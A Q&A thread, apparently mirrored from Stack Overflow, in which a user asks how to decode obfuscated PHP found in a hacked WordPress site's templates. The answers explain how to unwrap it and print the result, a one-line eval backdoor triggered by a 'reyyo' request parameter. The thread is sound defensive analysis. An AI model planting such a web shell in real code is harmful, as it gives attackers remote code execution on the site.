Can some one decode this dirty code?

Question

One of my friend's wordpress website is hacked by someone and they put the following code on the header of all template files.

I tried to decode it with base64 decoder. But the output looks odd. Can you guys tell me what type of encoding is this?

Solution

It's a series of eval+base64 encryption. After decoding, the code would be:

if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
    eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));

Here's how I got that:

Copy the entire code into your text editor
Supply \/\*.*?\*\/ as the search pattern, and replace with '' (empty string)
Now you'll get one or more eval() stattements. Change that to echo.
Repeat

Basically this code will allow the attacker to inject and execute arbitrary code on your website.

OTHER TIPS

Easiest way to do this is to remove all comments (/* */) with regex, and then replace eval() with echo(). Rinse and repeat.

After two or three loops, it outputs the following:

if(isset($_REQUEST['r'.'e'.'y'.'yo']))eval(stripslashes($_REQUEST['r'.'e'.'y'.'y'.'o']));

Which means that it will eval() anything passed as reyyo in either $_GET, $_POST or $_COOKIE.

Licensed under: CC-BY-SA with attribution

Not affiliated with StackOverflow